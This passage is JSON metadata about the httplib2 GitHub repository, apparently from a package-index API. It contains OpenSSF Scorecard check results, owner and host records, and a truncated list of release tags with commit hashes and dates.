2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pk